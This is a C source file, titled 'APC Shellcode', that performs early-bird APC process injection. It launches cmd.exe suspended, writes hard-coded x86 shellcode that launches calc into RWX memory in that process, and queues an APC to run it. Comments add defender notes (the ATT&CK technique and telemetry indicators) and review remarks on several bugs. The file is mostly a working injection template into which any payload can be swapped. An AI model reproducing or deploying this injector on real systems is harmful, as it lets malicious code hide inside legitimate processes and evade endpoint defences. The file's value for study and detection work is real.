APC Shellcode
#include <windows.h> | |
#include <stdio.h> | |
#include <TlHelp32.h> | |
/*
 * Entry point: spawns cmd.exe in a suspended state, copies the byte string
 * below into a newly allocated writable+executable region of that child, and
 * queues an APC pointing at the region on the child's not-yet-started primary
 * thread before resuming it. argc/argv are unused; the child path and the
 * payload are hard-coded, so nothing here consumes external input.
 *
 * Defender notes: the observable call sequence is CreateProcessA(CREATE_SUSPENDED)
 * -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
 * QueueUserAPC -> ResumeThread, i.e. MITRE ATT&CK T1055.004 (Process
 * Injection: Asynchronous Procedure Call). Telemetry that records cross-process
 * executable allocations/writes, or APCs queued into a suspended thread, sees
 * every step; an RWX private region in a process that has not yet executed a
 * single instruction of its own image is the simplest indicator.
 */
int main(int argc, char **argv)
{
    /* 14 string pieces of 8 escaped bytes = 112 bytes, stored as a C string.
     * None of the bytes is 0x00, which every strlen() call below depends on;
     * a NUL anywhere in the payload would silently truncate the copy.
     * NOTE(review): the fs: segment-override prefix (0x64) on the second
     * instruction suggests 32-bit x86 code, which would not be valid in a
     * 64-bit child -- confirm against the build target. The ASCII fragments
     * "Crea", "oces" and "calc" are visible in the bytes. */
    char *shellcode =
    "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
    "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
    "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
    "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    "\x45\x81\x3e\x43\x72\x65\x61\x75"
    "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
    "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
    "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    "\x6c\x63\x89\xe2\x52\x52\x53\x53"
    "\x53\x53\x53\x53\x52\x53\xff\xd7";
    HANDLE hThread;
    HANDLE hProcess;   /* never assigned -- see the CloseHandle() call below */
    PROCESS_INFORMATION processInfo;
    STARTUPINFOA info;
    /* STARTUPINFOA.cb is documented as required to hold sizeof(info); it is
     * zeroed here and never set. */
    ZeroMemory(&info, sizeof(info));
    ZeroMemory(&processInfo, sizeof(processInfo));
    DWORD oldProtect;   /* unused */
    char pPath[] = "C:\\Windows\\System32\\cmd.exe";
    /* Return value unchecked: on failure processInfo stays zeroed and every
     * call below operates on NULL handles. bInheritHandles is TRUE although
     * nothing here is meant to share handles with the child. */
    CreateProcessA(pPath, NULL, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, &info, &processInfo);
    /* strlen() returns size_t but is printed with %d (format mismatch);
     * <string.h> is not included directly -- presumably reached through
     * <windows.h>, verify. */
    printf("@g3troot - Length : %d bytes\n", strlen(shellcode));
    printf("Allocating Remote Memory For Shellcode\n");
    /* Writable+executable private memory in another process; result unchecked
     * (NULL on failure is passed straight to WriteProcessMemory). */
    LPVOID resultPtr = VirtualAllocEx(processInfo.hProcess, NULL, strlen(shellcode) + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    /* Casting a pointer to unsigned int truncates it on 64-bit builds; %p
     * would print the full value. */
    printf("Shellcode Address: 0x%X\n", (unsigned int)resultPtr);
    printf("Write Shellcode To Remote Process\n");
    /* Copies the 112 bytes plus the terminating NUL; the BOOL result and the
     * bytes-written count are both discarded. */
    WriteProcessMemory(processInfo.hProcess, resultPtr, shellcode, strlen(shellcode) + 1, NULL);
    int targetProc = processInfo.dwProcessId;
    printf("PID: cmd.exe - %d\n", targetProc);
    /* Opens a second handle to the child's primary thread although
     * processInfo.hThread already refers to it; THREAD_ALL_ACCESS is broader
     * than the two calls below need. Result unchecked. */
    hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, processInfo.dwThreadId);
    /* The APC targets the region just written; it runs on the child's primary
     * thread after ResumeThread, once that thread becomes alertable --
     * presumably during thread start-up, before the image's own entry point
     * (not verifiable from this file). */
    QueueUserAPC((PAPCFUNC)resultPtr, hThread, NULL);
    ResumeThread(hThread);
    /* hProcess was never initialised, so this closes an indeterminate handle
     * value. The handle that was actually opened, processInfo.hProcess, is
     * never closed, and neither is processInfo.hThread. */
    CloseHandle(hProcess);
    CloseHandle(hThread);
    /* MEM_RELEASE is documented to require dwSize == 0, so this call fails and
     * the region stays mapped. It is also issued right after ResumeThread,
     * while the queued APC may still be executing in that region. */
    VirtualFreeEx(processInfo.hProcess, resultPtr, strlen(shellcode), MEM_RELEASE);
    return EXIT_SUCCESS;   /* <stdlib.h> is likewise not included directly */
}